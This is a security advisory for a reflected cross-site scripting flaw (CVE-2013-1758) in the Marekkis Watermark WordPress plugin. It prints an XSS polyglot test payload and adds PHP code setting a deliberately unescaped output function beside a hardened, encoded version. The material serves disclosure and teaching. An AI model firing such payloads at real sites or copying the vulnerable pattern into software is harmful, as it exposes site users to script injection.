
WordPress Marekkis Watermark Cross Site Scripting

18 Feb 2013 | Reported by Aditya Balapure | Type: packetstorm | Source: packetstormsecurity.com

`#############################  
Exploit Title : Reflective XSS in Marekkis Watermark-Plugin Cross-Site Scripting Vulnerability  
Author: Aditya Balapure  
home: http://adityabalapure.blogspot.in/  
Date: 18/02/13  
software link: http://wordpress.org/extend/plugins/marekkis-watermark/  
CVE Assigned - CVE-2013-1758  
  
#############################  
Marekkis Watermark-Plugin description  
  
Marekkis Watermark-Plugin for WordPress can watermark your pictures in two different ways:  
  
Insert your watermark while the picture is being uploaded.  
After activation, every picture that you upload with the WordPress built-in media uploader will be watermarked.  
  
In the configuration-screen you can set up the position and the type of your watermark. It can be your logo (.png-file) with transparent background or a free text with color, font, size, shadow and transparency-level of your choice. See screenshots.  
  
Insert your watermark on all chosen pictures from a directory on your web-server.  
Marekkis Watermark makes it possible to create a watermark on media files that are already uploaded on your server. So you can mark all your old pictures with the new watermark.  
  
  
##########################  
XSS location  
  
The Marekkis Watermark-Plugin for WordPress (http://wordpress.org/extend/plugins/marekkis-watermark/) has a reflected XSS vulnerability in the Path input box.  
  
Script Used-  
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";  
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--  
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>  
  
##########################  
Vendor Notification  
  
05/02/2013 to: - Vendor notified awaiting action  
17/02/2013 - Fixed and closed  
`
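The advisory does not show the plugin's code, so the following is an added example, not code from the plugin or from the advisory's author. It puts an unescaped echo of the Path value beside a version that encodes for the HTML attribute context and validates the value as a directory. The function names, the `path` field name, the attribute sink and the base directory are assumptions.

```php
<?php
// Added example: hypothetical names, not the plugin's actual code.

// Vulnerable pattern: the submitted value is echoed into an attribute as-is,
// so quotes and angle brackets in it end the attribute and start new markup.
function render_path_field_vulnerable(string $path): string {
    return '<input type="text" name="path" value="' . $path . '">';
}

// Hardened output: encode for the HTML attribute context.
// Inside WordPress the equivalent call is esc_attr().
function render_path_field_safe(string $path): string {
    $encoded = htmlspecialchars($path, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="path" value="' . $encoded . '">';
}

// Second layer: the field is assumed to hold a directory of pictures, so
// accept only an existing directory located at or below an allowed base.
function validate_path(string $path, string $base): ?string {
    $realBase = realpath($base);
    $real     = realpath($path);
    if ($realBase === false || $real === false || !is_dir($real)) {
        return null;
    }
    $prefix = rtrim($realBase, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($real !== $realBase && strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Test string taken from the advisory's "Script Used" section (third line).
$input = '></SCRIPT>">\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>';
$base  = sys_get_temp_dir(); // stand-in for the allowed picture directory

echo "vulnerable: ", render_path_field_vulnerable($input), PHP_EOL;
echo "hardened:   ", render_path_field_safe($input), PHP_EOL;

// The advisory's string does not resolve to a directory; the base itself does.
var_dump(validate_path($input, $base));
var_dump(validate_path($base, $base));
```

Output encoding is the fix for the reflection itself; the path check only narrows what the field accepts and does not replace it.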

Vulners AI Score: 0.1 (low risk)
EPSS: 0.00347